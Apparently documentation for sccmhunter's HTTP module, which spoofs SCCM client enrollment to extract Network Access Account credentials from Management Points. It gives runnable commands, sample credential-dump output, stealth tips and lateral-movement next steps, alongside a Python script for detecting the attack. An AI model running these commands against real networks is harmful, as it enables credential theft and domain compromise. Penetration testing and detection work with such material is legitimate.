The http module exploits SCCM’s client enrollment process to extract Network Access Account credentials from Management Points. This technique combines Adam Chester’s research with skelsec’s deobfuscator to spoof legitimate client enrollment and retrieve sensitive policy information.
This attack leverages the fact that SCCM clients automatically receive Network Access Account credentials through policy requests, allowing attackers to extract these credentials by masquerading as legitimate clients.

Attack Overview

The HTTP client enrollment attack works by:
  1. Machine Account Creation: Creating a new machine account in Active Directory (or using existing credentials)
  2. Client Registration: Registering with Management Points as a legitimate SCCM client
  3. Policy Request: Requesting client policies that contain Network Access Account credentials
  4. Credential Extraction: Decrypting and extracting the credentials from the policy response
This attack requires machine account privileges. The -auto flag will automatically create a machine account if you have sufficient privileges, or you can provide existing machine account credentials.

Troubleshooting Common Issues

Cause: This error (the ‘NoneType’ object has no attribute split failure described in the Troubleshooting Guide below) typically occurs when the policy is not yet available from the Management Point immediately after registration.
Solutions:
  • Increase sleep time with the -sleep flag (default: 10 seconds)
  • Use manual policy request with -mp and -uuid flags
  • Wait for SCCM database updates to complete
  • Check for proxy interference in network communications
Root Causes:
  • SCCM database performance issues
  • Network proxy delays
  • Management Point processing lag
  • Timing synchronization issues

Prerequisites

Requirements

  • Valid Active Directory credentials
  • Ability to create machine accounts OR existing machine account credentials
  • Network access to discovered Management Points
  • Previous enumeration data from find and smb modules

Command Syntax

python3 sccmhunter.py http [OPTIONS]

Parameters

Parameter | Description | Example
-u | Username for authentication | administrator
-p | Password for authentication | P@ssw0rd
-d | Target domain name | internal.lab
-dc-ip | Domain controller IP or FQDN | 10.10.100.100
-hashes | NT:LM hash for authentication | aad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76
-k | Use Kerberos authentication |
-no-pass | Don’t prompt for password |
-aes | AES key for Kerberos (128/256 bits) |
-ldaps | Use LDAPS instead of LDAP |

Parameter | Description | Example
-auto | Automatically create machine account and extract policies |
-cn | Existing machine account name | DESKTOP-ABC123$
-cp | Machine account password | RandomPassword123

Parameter | Description | Example
-uuid | Registration UUID for manual policy request | 7E7CC94B-E056-45C8-A2D9-03AD3114AE1F
-mp | Specific Management Point to target | mp.internal.lab
-sleep | Wait time between registration and policy request (seconds) | 20
-debug | Enable verbose logging |
Use the -auto flag for fully automated attacks when you have sufficient privileges to create machine accounts. For stealth or when using existing credentials, use the manual approach with -cn and -cp.

Usage Examples

Fully automated attack using an account with machine account creation privileges
python3 sccmhunter.py http -u administrator -p P@ssw0rd -d internal.lab -dc-ip 10.10.100.100 -auto
Expected Output:
[19:25:31] INFO     [*] Searching for Management Points from database.
[19:25:32] INFO     [+] Found http://mp.internal.lab/ccm_system_windowsauth
[19:25:32] INFO     [+] Found http://sccm.internal.lab/ccm_system_windowsauth
[19:25:32] INFO     [+] Found http://sccm2.internal.lab/ccm_system_windowsauth
[19:25:33] INFO     [+] Found http://active.internal.lab/ccm_system_windowsauth
[19:25:33] INFO     [*] User selected auto. Attempting to add a machine account then request policies.
[19:25:36] INFO     [+] DESKTOP-KS233C4P$ created with password: K2bNRZJxE0lf
[19:25:36] INFO     [*] Attempting to grab policy from mp.internal.lab
[19:25:37] INFO     [*] Done.. our ID is 7FB2729E-0E61-4CB7-A74A-5AD3170F1A35
[19:25:37] INFO     [*] Waiting 10 seconds for database to update.
[19:25:48] INFO     [+] Got NAA credential: lab\administrator:P@ssw0rd
[19:25:48] INFO     [+] Got NAA credential: lab\administrator:P@ssw0rd
[19:25:48] INFO     [+] Done.. decrypted policy dumped to /root/.sccmhunter/logs/loot/mp_naapolicy.xml
The automatic mode creates a new machine account, registers with all discovered Management Points, and extracts Network Access Account credentials. The decrypted policy is saved for further analysis.
Use pre-existing machine account credentials for stealthy operations
python3 sccmhunter.py http -u administrator -p P@ssw0rd -d internal.lab -dc-ip 10.10.100.100 -cn wikidemo$ -cp P@ssw0rd
Expected Output:
[21:14:28] INFO     [*] Searching for Management Points from database.
[21:14:29] INFO     [+] Found http://mp.internal.lab/ccm_system_windowsauth
[21:14:30] INFO     [+] Found http://sccm.internal.lab/ccm_system_windowsauth
[21:14:31] INFO     [+] Found http://sccm2.internal.lab/ccm_system_windowsauth
[21:14:32] INFO     [+] Found http://active.internal.lab/ccm_system_windowsauth
[21:14:32] INFO     [*] Attempting to grab policy from mp.internal.lab
[21:14:34] INFO     [*] Done.. our ID is 7E7CC94B-E056-45C8-A2D9-03AD3114AE1F
[21:14:34] INFO     [*] Waiting 10 seconds for database to update.
[21:14:45] INFO     [+] Got NAA credential: lab\administrator:P@ssw0rd
[21:14:45] INFO     [+] Got NAA credential: lab\administrator:P@ssw0rd
[21:14:45] INFO     [+] Done.. decrypted policy dumped to /root/.sccmhunter/logs/loot/mp_naapolicy.xml
Using existing machine credentials avoids creating new accounts and may be less detectable. Record the UUID for potential future policy requests.
Request policies using previously obtained registration UUID
python3 sccmhunter.py http -u administrator -p P@ssw0rd -d internal.lab -dc-ip 10.10.100.100 -mp mp.internal.lab -uuid 7E7CC94B-E056-45C8-A2D9-03AD3114AE1F
Expected Output:
[21:16:19] INFO     Submitting manual policy request from previous registration 7E7CC94B-E056-45C8-A2D9-03AD3114AE1F
[21:16:20] INFO     [+] Got NAA credential: lab\administrator:P@ssw0rd
[21:16:20] INFO     [+] Got NAA credential: lab\administrator:P@ssw0rd
[21:16:20] INFO     [+] Done.. decrypted policy dumped to /root/.sccmhunter/logs/loot/mp_naapolicy.xml
Manual policy requests are useful when timing issues occur during initial registration. This allows you to retry policy extraction without re-registering the client.

Attack Analysis

Understanding Network Access Account Credentials

The extracted Network Access Account (NAA) credentials provide:
  • Domain Authentication: Access to network resources during OS deployment
  • Share Access: Read access to distribution point content shares
  • Lateral Movement: Potential for further domain compromise
  • Task Sequence Variables: Additional secrets from deployment configurations

Operational Security

Detection Considerations:
  • Machine account creation may trigger security alerts
  • HTTP traffic to Management Points may be logged
  • Policy requests create entries in SCCM logs
  • Consider using existing machine accounts when possible
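A correlation check a defender can run over the three signals listed above, as an added example that is not part of sccmhunter or the original page: it joins Windows Security event 4741 (computer account created) with the Management Point's IIS request log and flags any computer account that registered with the MP within a short window of being created, which is exactly the sequence the -auto mode produces. The event records and IIS log lines are constructed; the registration path /ccm_system_windowsauth/request matches the MP URLs shown in this page's output, while the /ccm_system/request policy path and the trimmed IIS field layout are assumptions.

```python
"""Correlate computer-account creation with Management Point registration.
Added defensive example; all sample data below is constructed, not real logs."""
from datetime import datetime, timedelta

# Registration endpoint as seen in the MP URLs on this page; POLICY_PATH is an
# assumption about the anonymous policy-request endpoint on the MP.
REGISTRATION_PATH = "/ccm_system_windowsauth/request"
POLICY_PATH = "/ccm_system/request"

# Constructed: Windows Security event 4741 ("A computer account was created"),
# reduced to the fields a SIEM export would typically carry.
ACCOUNT_CREATED_EVENTS = [
    {"time": "2024-05-01 19:25:36", "event_id": 4741,
     "target": "DESKTOP-KS233C4P$", "creator": "administrator"},
    {"time": "2024-05-01 08:00:00", "event_id": 4741,
     "target": "WS-HR-0042$", "creator": "svc_imaging"},
]

# Constructed: IIS W3C log excerpt from the Management Point. IIS logs in UTC by
# default; real deployments must normalize both sources to one time zone.
MP_IIS_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status
2024-05-01 19:25:37 POST /ccm_system_windowsauth/request INTERNAL\\DESKTOP-KS233C4P$ 10.10.100.57 200
2024-05-01 19:25:48 POST /ccm_system/request - 10.10.100.57 200
2024-05-01 08:41:12 POST /ccm_system_windowsauth/request INTERNAL\\WS-HR-0042$ 10.10.20.15 200
2024-05-01 10:02:09 POST /ccm_system_windowsauth/request INTERNAL\\WS-FIN-0007$ 10.10.30.9 401
"""


def parse_iis_log(text):
    """Parse the trimmed W3C format above into dicts; skips directive lines."""
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        date, time, method, uri, user, ip, status = line.split()
        rows.append({
            "time": datetime.fromisoformat(f"{date} {time}"),
            "method": method, "uri": uri,
            "user": None if user == "-" else user,
            "ip": ip, "status": int(status),
        })
    return rows


def sam_name(user):
    """'INTERNAL\\HOST$' -> 'HOST$' so IIS usernames match event 4741 targets."""
    return user.rsplit("\\", 1)[-1].upper()


def correlate(events, rows, window=timedelta(minutes=30)):
    """Flag computer accounts that registered with the MP soon after creation.

    Only successful (200) authenticated registrations count; a follow-up policy
    request from the same client IP inside the window is recorded as well,
    since that is the step in which NAA policy is actually handed out."""
    findings = []
    for ev in events:
        if ev["event_id"] != 4741:
            continue
        created = datetime.fromisoformat(ev["time"])
        acct = ev["target"].upper()
        for r in rows:
            if (r["uri"] != REGISTRATION_PATH or r["status"] != 200
                    or r["user"] is None or sam_name(r["user"]) != acct):
                continue
            delta = r["time"] - created
            if not (timedelta(0) <= delta <= window):
                continue
            policy_followed = any(
                p["uri"] == POLICY_PATH and p["ip"] == r["ip"]
                and r["time"] <= p["time"] <= r["time"] + window
                for p in rows)
            findings.append({
                "account": acct, "creator": ev["creator"], "client_ip": r["ip"],
                "seconds_after_creation": int(delta.total_seconds()),
                "policy_request_followed": policy_followed,
            })
    return findings


if __name__ == "__main__":
    for f in correlate(ACCOUNT_CREATED_EVENTS, parse_iis_log(MP_IIS_LOG)):
        print(f"[!] {f['account']} created by {f['creator']} registered with the MP "
              f"{f['seconds_after_creation']}s later from {f['client_ip']} "
              f"(policy request followed: {f['policy_request_followed']})")
```

With the constructed data only DESKTOP-KS233C4P$ is flagged: it registered one second after creation and a policy request followed from the same address, whereas WS-HR-0042$ registered forty minutes after creation and falls outside the window. Legitimate imaging also creates an account and enrolls it shortly afterwards, so in practice the window should be tuned against a baseline and the creator field used to exclude known provisioning accounts rather than to suppress the alert outright.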

Output Files

Generated Artifacts:
  • Decrypted policy XML files
  • Registration UUIDs for future use
  • Network Access Account credentials
  • Task sequence variable dumps

Troubleshooting Guide

‘NoneType’ object has no attribute split
  • Increase -sleep value to 20-30 seconds
  • Try manual policy request with saved UUID
  • Check Management Point availability
Authentication failures
  • Verify machine account creation permissions
  • Confirm machine account credentials are correct
  • Check Kerberos vs NTLM authentication requirements
No Management Points found
  • Run find module first to discover MPs
  • Verify Management Points are accessible
  • Check network connectivity to HTTP endpoints

Next Steps

Credential Usage

Use extracted NAA credentials for:
  • SMB share enumeration
  • Distribution Point access
  • Further lateral movement

MSSQL Exploitation

Leverage credentials for database attacks and privilege escalation

DPAPI Extraction

Extract additional secrets from client systems using local admin access